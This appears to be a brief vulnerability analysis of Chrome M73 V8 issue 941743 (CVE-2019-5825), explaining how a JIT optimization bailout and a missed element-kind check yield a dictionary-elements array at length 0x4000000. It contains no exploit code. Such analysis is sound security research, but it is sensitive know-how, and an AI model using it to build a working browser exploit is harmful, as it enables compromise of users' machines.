# Chrome M73 issue 941743

## 3. bug analysis

1. The optimization of JSCreateArray (for |a2|) bailout at typed lowering phase. When executing JITed code, it calls to |Runtime_NewArray|.
2. There’s a CheckMaps for |arr|, but it can’t ensure an array that produced by |arr| is the same type. For example, |arr| is extended by |push| and it has PACKED_SMI_ELEMENTS, but |a2| could be constructed by |Runtime_NewArray| and it could have DICTIONARY_ELEMENTS.
3. TransitionAndStoreElement assumes the source array should be HOLEY_SMI_ELEMENTS, this can’t ensure either. Because when calling to |Runtime_NewArray| and array’s actual length >= 0x4000000, there’ll be a dictionary elements array. So our bug occurs.

issue-941743-cve-2019-5825

crbug-941743